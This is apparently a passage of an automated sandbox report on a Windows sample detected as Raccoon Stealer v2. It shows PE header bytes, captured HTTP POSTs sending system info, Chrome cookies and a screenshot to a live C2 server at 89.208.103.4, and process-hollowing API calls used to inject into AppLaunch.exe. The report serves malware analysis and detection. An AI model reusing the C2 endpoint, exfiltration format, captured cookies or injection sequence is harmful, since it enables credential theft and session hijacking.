2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 70 0e 00 00 2e 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 a0 0e 00 00 0c 00 00 00 26 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 b0 0e 00 00 04 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 c0 0e Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL",bv! a n* ;.text`P`.data\|' (@`.rdataDPF:@`@.bss(`.edatan*,@0@.idata@0.CRT,@0.tls @0.rsrc@0.reloc; <@0B/48`@@B/19Rp@B/31]'@(@B/45-p.@B/57\&@0B/70#2@B/81s:
Aug 11, 2022 06:57:10.730874062 CEST	6558	OUT	POST /a9de71948549020b4b91e4dc94a097d9 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=X7SGQl6K23Pjp5NR User-Agent: rqwrwqrqwrqw Host: 89.208.103.4 Content-Length: 7371 Connection: Keep-Alive Cache-Control: no-cache
Aug 11, 2022 06:57:10.730968952 CEST	6566	OUT	Data Raw: 2d 2d 58 37 53 47 51 6c 36 4b 32 33 50 6a 70 35 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 79 73 74 65 6d 20 Data Ascii: --X7SGQl6K23Pjp5NRContent-Disposition: form-data; name="file"; filename="System Info.txt"Content-Type: application/x-objectSystem Information: - Locale: English- Time zone: - OS: Windows 10 Pro- Architecture: x64- CPU: Intel(R
Aug 11, 2022 06:57:11.350249052 CEST	6567	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Aug 2022 04:57:11 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw" Data Raw: 72 65 63 65 69 76 65 64 Data Ascii: received
Aug 11, 2022 06:57:12.418275118 CEST	6568	OUT	POST /a9de71948549020b4b91e4dc94a097d9 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=a43PpQwQt3r99wpD User-Agent: rqwrwqrqwrqw Host: 89.208.103.4 Content-Length: 597 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 61 34 33 50 70 51 77 51 74 33 72 39 39 77 70 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5c 63 6f 6f 6b 69 65 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6f 62 6a 65 63 74 0d 0a 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 54 52 55 45 09 31 33 32 36 31 37 36 32 38 37 37 34 36 32 33 36 35 09 4e 49 44 09 64 6a 45 77 69 6d 31 63 79 2b 38 57 6c 62 69 59 6a 45 77 5a 62 35 54 46 64 43 42 62 69 6e 30 70 74 7a 45 44 6d 51 35 51 69 46 65 32 4d 5a 4a 63 4d 33 41 59 6f 52 34 56 30 53 4d 77 48 47 72 2f 64 6a 33 6e 58 6f 5a 59 45 47 63 34 47 34 75 38 38 46 45 53 52 63 78 66 70 38 50 58 42 4d 78 78 46 57 56 77 4a 4d 58 66 4a 41 54 68 34 36 62 4e 70 52 59 79 63 70 55 41 4d 77 6e 48 58 50 35 2b 48 69 6c 77 69 49 2b 56 33 47 52 67 49 48 30 59 71 45 32 42 57 6d 72 41 4d 75 47 38 76 4d 47 69 4a 52 52 45 4f 45 49 43 55 6c 6c 54 63 31 79 45 56 57 46 35 61 56 54 33 66 79 66 32 79 35 31 61 32 4d 51 30 50 4c 37 61 53 56 37 63 67 64 33 47 31 4e 70 44 41 7a 5a 48 35 78 59 38 47 68 38 39 61 35 39 45 61 6f 72 6a 4a 61 4b 5a 64 35 71 33 65 6a 6f 65 6d 74 48 73 6a 70 4c 30 30 6a 49 37 70 2b 62 68 56 54 74 50 50 57 4c 54 32 72 64 7a 2f 59 34 3d 0a 43 3a 5c 55 73 65 72 73 5c 68 61 72 64 7a 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 5c 44 65 66 61 75 6c 74 7c 48 4a 68 39 6c 79 68 75 2f 6a 32 6b 36 7a 47 4e 37 79 52 30 50 79 48 59 6c 4b 44 69 4f 2f 77 56 61 30 70 48 51 6b 51 79 79 45 6b 3d 7c 38 35 2e 30 2e 34 31 38 33 2e 31 32 31 2d 36 34 0d 0a 0d 0a 2d 2d 61 34 33 50 70 51 77 51 74 33 72 39 39 77 70 44 2d 2d Data Ascii: --a43PpQwQt3r99wpDContent-Disposition: form-data; name="file"; filename="\cookies.txt"Content-Type: application/x-object.google.comTRUE/TRUE13261762877462365NIDdjEwim1cy+8WlbiYjEwZb5TFdCBbin0ptzEDmQ5QiFe2MZJcM3AYoR4V0SMwHGr/dj3nXoZYEGc4G4u88FESRcxfp8PXBMxxFWVwJMXfJATh46bNpRYycpUAMwnHXP5+HilwiI+V3GRgIH0YqE2BWmrAMuG8vMGiJRREOEICUllTc1yEVWF5aVT3fyf2y51a2MQ0PL7aSV7cgd3G1NpDAzZH5xY8Gh89a59EaorjJaKZd5q3ejoemtHsjpL00jI7p+bhVTtPPWLT2rdz/Y4=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\|HJh9lyhu/j2k6zGN7yR0PyHYlKDiO/wVa0pHQkQyyEk=\|85.0.4183.121-64--a43PpQwQt3r99wpD--
Aug 11, 2022 06:57:12.542366028 CEST	6569	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Aug 2022 04:57:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw" Data Raw: 72 65 63 65 69 76 65 64 Data Ascii: received
Aug 11, 2022 06:57:15.959556103 CEST	6569	OUT	POST /a9de71948549020b4b91e4dc94a097d9 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3rxWtrZ2KLNztiDw User-Agent: rqwrwqrqwrqw Host: 89.208.103.4 Content-Length: 85278 Connection: Keep-Alive Cache-Control: no-cache
Aug 11, 2022 06:57:15.959640026 CEST	6591	OUT	Data Raw: 0d 0a 2d 2d 33 72 78 57 74 72 5a 32 4b 4c 4e 7a 74 69 44 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 2d 2d 2d 53 63 Data Ascii: --3rxWtrZ2KLNztiDwContent-Disposition: form-data; name="file"; filename="---Screenshot.jpeg"Content-Type: application/x-objectJFIF``C $.' ",#(7),01444'9=82<.342C2!
Aug 11, 2022 06:57:15.983911037 CEST	6599	OUT	Data Raw: 73 2f ab ea 8e d7 8c d7 ae 5a f2 74 b9 99 b6 8c 99 54 92 ae a7 1f 21 19 3c ae 38 38 e9 56 ae bc 4f ae 5e 5c db 5c 4b 79 12 cb 6d 74 2f 23 30 da c5 10 33 8c 7e f1 c2 a8 0e dc 75 6c 9e be a6 9f b3 a9 fd 7a af f2 b0 7b 48 5a df d7 5f f3 36 20 d2 34 Data Ascii: s/ZtT!<88VO^\\Kymt/#03~ulz{HZ_6 4lQ2jV$6N3T`895G#Ofo#1\\|R}O<;jM;%9yS1VeTx$acb*q5jM[f
Aug 11, 2022 06:57:15.984015942 CEST	6614	OUT	Data Raw: 4e ec 8f 69 12 86 49 a7 80 de 86 af 06 84 0f 96 31 4b e7 0f e1 45 14 5d 92 ea 79 15 04 72 9e 88 4f e1 52 2d bc c7 f8 71 f5 a9 cc cf db 02 9a 64 7f ef 1a 35 27 9d b0 16 ad dd d4 7e 34 f1 6e 83 ac 9f 95 47 b8 fa d2 03 4e cc 97 76 58 d9 02 9f bc 4d Data Ascii: NiI1KE]yrOR-qd5'~4nGNvXM;\|+ABlZ@}_{/UsFi{8n>.>>f${s+dcLXGEdK{x\|5oo\AZ}~&qOJ<3tro_eqBVGe<g;c8>EhXk:M
Aug 11, 2022 06:57:15.984359980 CEST	6617	OUT	Data Raw: a3 64 92 c5 30 4e 84 15 24 11 fa 8f c2 a1 f0 56 8f a8 db ea 5a 9e af a8 5a 25 97 db 08 d9 6c 9f c3 ce 49 c7 6f ff 00 5d 57 d2 e4 17 8f e3 5d 4a 1e 6d a6 06 28 dc 74 62 91 b0 24 7b 72 28 ad 1a 6a 33 8c 75 51 b5 9d ef db 4e dd c2 8c aa 39 42 52 d1 Data Ascii: d0N$VZZ%lIo]W]Jm(tb${r(j3uQN9BRV}{>VGiYITA>V.tCF*o yO2"K2!~>VJGX/f4H}sU5ej9$+R!j9$!3Qv$4
Aug 11, 2022 06:57:15.984400034 CEST	6627	OUT	Data Raw: 49 8a 72 f5 a7 60 14 0a 75 02 96 aa c4 00 e9 4b de 93 d2 96 a8 41 4e 03 26 90 53 97 8a 2c 26 c7 01 8a 5a 4c d1 da ac 91 0d 18 e2 97 1c 51 40 0d c5 25 38 8a 29 58 61 4a 29 b4 a2 9a 10 ea 28 1d 29 68 24 31 46 29 c0 51 8a ab 05 c0 0a 7d 20 14 ee d5 Data Ascii: Ir`uKAN&S,&ZLQ@%8)XaJ)()h$1F)Q} IF9IE(pM8h;PMY - Q1`PNNDisTc4 ^H)1zSN8U"X(QQ0KIKA"'ZaasH-bJZb)HZJSL
Aug 11, 2022 06:57:15.984867096 CEST	6635	OUT	Data Raw: d6 9b c4 da b4 c9 2a e7 4f 84 cc 8f 1c 8f 6d a6 db c2 ec ae 30 c0 b2 46 0f 20 9e f5 4e cb 57 d4 f4 db 61 6f 65 75 e5 42 1d e4 0a 63 56 c3 3c 66 36 20 90 7a a1 23 f2 3d 40 35 54 d2 52 f6 50 da c3 55 25 7b dc 96 d6 ea e6 c6 1b 98 ad 65 11 ad d4 3e Data Ascii: Om0F NWaoeuBcV<f6 z#=@5TRPU%{e>Dh;r9rx7[9^yj)F;^d- @:iE0C`/zRNhQJb(sKm.hisMXP1M8RE-Q#8
Aug 11, 2022 06:57:16.008280039 CEST	6645	OUT	Data Raw: 45 3b 8a c4 9b 87 ad 1b a9 b4 51 70 b0 ed d4 64 d2 51 4e e2 0c d1 45 14 00 a2 96 92 8e f4 c0 5a 51 4d a0 52 01 d4 73 46 68 a7 71 0b 4a 0d 25 19 a6 21 d9 a2 92 81 4c 56 1c 29 69 b4 b4 08 5a 50 69 b4 b9 a6 03 f3 45 34 1a 01 a6 2b 0e a5 a6 83 4b 4d Data Ascii: E;QpdQNEZQMRsFhqJ%!LV)iZPiE4+KM3KIKLBfE-.iAq)ibKMJ)(OZMsK.!AJ)THJ0\40pK<zhSFcM&hX4f(qXx4Ni4M(4h*+K
Aug 11, 2022 06:57:16.008779049 CEST	6654	OUT	Data Raw: 9a 06 3b 34 b4 ca 29 5c 07 66 90 9a 42 68 cd 17 1d 82 8a 4a 29 00 b4 52 51 40 ec 2e 69 29 28 cd 20 16 8a 6e 68 a0 07 51 49 9a 33 40 0b 45 36 94 51 70 16 8c d3 69 33 40 58 93 34 66 9b 4e cd 30 16 8a 4c d2 67 9a 04 3a 92 96 92 98 07 6a 28 a2 90 05 Data Ascii: ;4)\fBhJ)RQ@.i)( nhQI3@E6Qpi3@X4fN0Lg:j(QLJ;4fx9m{<BW_K(?S6R-)cdbe&8y8\PO4A9"~o_z3DOj:.'7`Jqbj^GiI%
Aug 11, 2022 06:57:16.100912094 CEST	6655	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Aug 2022 04:57:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw" Data Raw: 72 65 63 65 69 76 65 64 Data Ascii: received

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: c35d4e641adf21bead54611499c416c8e2de75ac96098.exePID: 5796, Parent PID: 5332

General

Target ID:	0
Start time:	06:57:05
Start date:	11/08/2022
Path:	C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe"
Imagebase:	0x13b0000
File size:	253424 bytes
MD5 hash:	C5AF2B53CF4B8D6177240A822EF6F350
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: AppLaunch.exePID: 5728, Parent PID: 5796

General

Target ID:	1
Start time:	06:57:06
Start date:	11/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0xc90000
File size:	98912 bytes
MD5 hash:	6807F903AC06FF7E1670181378690B22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000001.00000003.256216440.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000001.00000003.248184995.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000001.00000003.247123478.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000001.00000003.251086981.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000001.00000003.246414861.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000001.00000002.263653396.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000001.00000003.245521959.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000001.00000003.252997013.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: c35d4e641adf21bead54611499c416c8e2de75ac96098.exePID: 5796, Parent PID: 5332COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	1.4%
Signature Coverage:	2.9%
Total number of Nodes:	1380
Total number of Limit Nodes:	25

Executed Functions

Function 013D8C41 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 467
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 013D8F22
GetThreadContext.KERNELBASE(?,00010007), ref: 013D8F37
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013D8F58
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 013D8F8A
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 013D8FAA
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 013D90DD
VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 013D90FA
VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 013D9164
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 013D9186
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013D91A1
SetThreadContext.KERNELBASE(?,00010007), ref: 013D91BE
ResumeThread.KERNELBASE(?), ref: 013D91CB

Strings

D, xrefs: 013D8E7A

Memory Dump Source

Source File: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
String ID: D
API String ID: 12256240-2746444292
Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction ID: e203372a10b65eb337cd0e83875c85b5ebfe65daf7a72ce755e41ab647f14d34
Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction Fuzzy Hash: EF120C72D002199BEB21CFA4DD84BEEBBB5FF04708F1484A9E609E6251D7749A84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 013B599A Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E013B599A(int _a4) {
				void* _t7;
				void* _t14;

				_t7 = E013BA2CC(_t14); // executed
				if(_t7 != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E013B5A1F(_t14, _a4);
				ExitProcess(_a4);
			}

0x013b599f
0x013b59a7
0x013b59c3
0x013b59c3
0x013b59cc
0x013b59d5

APIs

GetCurrentProcess.KERNEL32(?,?,013B5999,?,?,?,?,?,013B63B0), ref: 013B59BC
TerminateProcess.KERNEL32(00000000,?,013B5999,?,?,?,?,?,013B63B0), ref: 013B59C3
ExitProcess.KERNEL32 ref: 013B59D5

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e6ab2e98c065f48fd68c7d68fa1a3e08a4bf58efaf3a558a3cd55864fb2a7b88
Instruction ID: 00884c124953f95213d470258bae34017bac37a449b6003927df17f662402894
Opcode Fuzzy Hash: e6ab2e98c065f48fd68c7d68fa1a3e08a4bf58efaf3a558a3cd55864fb2a7b88
Instruction Fuzzy Hash: 6EE0B632010658AFCB226B68D988A983B69FB46355F008414FA06DA925EB36FD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013B2412 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E013B2412() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E013B241E); // executed
				return _t1;
			}

0x013b2417
0x013b241d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0000241E,013B1D42), ref: 013B2417

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bd42130fa8ff6ee46ccf8c356865451e4f648927f4cf57b2b5007194a4d62e86
Instruction ID: 7a37746712382aa1136e880fee5432e9a2366863706978d12ffb1452716469d1
Opcode Fuzzy Hash: bd42130fa8ff6ee46ccf8c356865451e4f648927f4cf57b2b5007194a4d62e86
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 013BA2CC Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013BA2CC(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E013B69A7(_t16,  &_v8); // executed
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x013ba2d9
0x013ba2db
0x013ba2de
0x013ba2e1
0x013ba2e4
0x013ba2f5
0x013ba2f7
0x013ba2e6
0x013ba2ea
0x013ba2f3
0x00000000
0x00000000
0x013ba2f3
0x013ba2fc

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc071a1b3937ba5bbda14af80111864d784411cc9e2c6fb935f058573ecd092
Instruction ID: 412bbf190239f90f5fdb663261ff4fba09fca429ffbc32aea94963eda7178636
Opcode Fuzzy Hash: efc071a1b3937ba5bbda14af80111864d784411cc9e2c6fb935f058573ecd092
Instruction Fuzzy Hash: 93E08C72911238EBCB14DB8CC984ACAF7ECEB44B44B1100A6FA01D7500D271DE40C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 013B685D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

